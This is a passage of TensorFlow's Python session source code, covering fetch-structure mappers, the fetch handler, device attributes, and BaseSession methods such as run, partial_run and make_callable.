return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = (
feed_handles or object_identity.ObjectIdentityDictionary())
self._ops = []
self._fetch_handles = object_identity.ObjectIdentityDictionary()
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
          ' Use return values, explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
  def _run(self, handle, fetches, feed_dict, options, run_metadata):
    """Perform either run or partial_run, depending on the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = object_identity.ObjectIdentityDictionary()
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
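  # Illustrative call pattern for make_callable() (an assumption, not from the
  # original source):
  #   train_step = sess.make_callable(train_op)
  #   train_step()  # reuses the precomputed fetch/target lists on every call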
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds a certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle is fed to a device-incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
